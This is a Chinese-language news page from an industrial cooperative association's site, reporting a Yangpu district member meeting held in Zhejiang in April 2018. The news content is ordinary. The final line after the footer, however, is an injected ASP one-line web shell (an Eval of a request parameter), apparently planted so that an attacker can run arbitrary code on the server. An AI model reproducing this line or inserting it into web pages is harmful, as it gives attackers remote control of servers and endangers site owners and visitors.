设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  2018年
 
感受美丽乡村新发展
上海市杨浦区工业合作协会二届三次会员大会纪实
 发布时间:2018/4/15 浏览次数:455

    为贯彻党的十九大精神,落实党建工作,促进经济发展,感受国家建设美丽乡村战略的成果,2018年4月12日-13日,杨浦区工业合作协会赴浙江上虞岭南乡召开二届三次会员大会。

    丛新惠理事长主持会议并从“创新工作思路,服务发展战略;发挥协会优势,聚人心增合力;发扬团队精神,打造杨浦品牌”三个方面作了协会2017年工作通报,部署了2018年杨浦工合的工作和活动计划。根据本协会章程的规定,秘书长江为民作了《关于杨浦工合新增会员的情况介绍》,泰禾集团作为协会新增会员,经理事长会议推荐为协会副理事长的建议获得与会会员的一致通过。

    本次会议的另一项重要内容是聆听岭南乡党委书记谢文权开展党建工作的经验交流。谢书记从“强化规划引领、强化制度保障、强化攻坚克难、强化党建引领”四个方面作了精彩生动的介绍。党员亮牌上岗,带领农民致富。东澄村---这个昔日的“光棍村”如今成了“观光村”,吸引着一批批远道而来的游客。52位与会会员被谢书记充满激情的报告深深的打动着,感受到岭南乡党建工作促进经济发展令人鼓舞的成果。

   

    出席本次会议的区商务委副主任(区粮食局局长)经琪和区委原常委、统战部长张慧珠先后作了讲话。经琪同志从“立足创新、凝聚人心、打造品牌”三个方面高度肯定杨浦工合开展的各项工作和活动,并赋诗一首:清明谷雨四月天,春意盎然百花开;生态建设新农村,上虞美景岭南乡。回首往事收获多,罗曼制造树品牌;群雄会师谋发展,展望未来更强大。老领导张慧珠充满激情的说到,改革开放四十年来,我国新农村建设发生了翻天覆地的变化。岭南乡的发展,更是让我们对习近平总书记十九大提出的决胜全面建成小康社会充满信心。她称赞杨浦工合一年来开展的工作体现了“争取领导、主动沟通、充满活力”的特点,具有较强的凝聚力。

    13日上午先后参观了时任浙江省省长李强关注和视察过的e游特色小镇和浙江和谐光催化科技有限公司,体验了互联网与科技环保发展的魅力。协会此次活动得到了杨浦工合副理事长—上海良珩建设工程有限公司杨海军董事长的大力支持。他出生全国著名的建筑之乡上虞,不但有装修上海连卡佛、K11等知名项目的荣耀业绩,还与时俱进成功进行多元化的发展,投资光催化环保产业。他立足上海,情系家乡,乐善好施,感恩社会。大家为此深感钦佩,也为协会拥有这么优秀的企业家自豪。

    一次富有创意、别开生面、生动活泼的会员大会在与会者的共同努力下获得圆满成功。

 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.